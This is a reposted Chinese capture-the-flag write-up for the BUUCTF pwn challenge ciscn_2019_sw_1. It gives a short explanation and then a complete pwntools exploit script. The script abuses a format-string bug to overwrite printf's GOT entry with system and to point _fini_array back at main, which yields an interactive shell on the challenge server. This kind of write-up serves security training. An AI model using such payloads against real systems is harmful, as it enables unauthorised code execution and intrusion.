[BUUCTF-pwn]——ciscn_2019_sw_1
生活随笔
收集整理的這篇文章主要介紹了
[BUUCTF-pwn]——ciscn_2019_sw_1
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
[BUUCTF-pwn]——ciscn_2019_sw_1
一個簡單的格式化字符串, 相信大家看到旁邊 的system和格式化字符串漏洞,想的一定是利用格式化字符串漏洞將printf_got表修改system_plt表,然后使其循環調用main第二次輸入’/bin/sh’就好
可能唯一需要說一下的就是, 程序結束時會調用_fini_array指向的函數指針,所以我們將其修改為mian就會循環調用了
算下偏移, 一看就是4
exploit
from pwn import *p = remote("node3.buuoj.cn",28235) #p = process("./ciscn_2019_sw_1") #gdb.attach(p, 'b printf') printf_got = 0x0804989C system_plt = 0x080483D0 fini_array = 0x0804979C main = 0x8048534 offset = 4 payload = p32(fini_array + 2) + p32(printf_got+2) + p32(printf_got) + p32(fini_array) payload += "%" + str(0x0804 - 0x10) + "c%4$hn" payload += "%5$hn" payload += "%" + str(0x83D0 - 0x0804) + "c%6$hn" payload += "%" + str(0x8534 - 0x83D0) + "c%7$hn" p.sendlineafter("name?\n",payload) p.sendlineafter("name?\n",'/bin/sh\x00') p.interactive()總結
以上是生活随笔為你收集整理的[BUUCTF-pwn]——ciscn_2019_sw_1的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: [BUUCTF-pwn]——starct
- 下一篇: [BUUCTF-pwn]——hgame2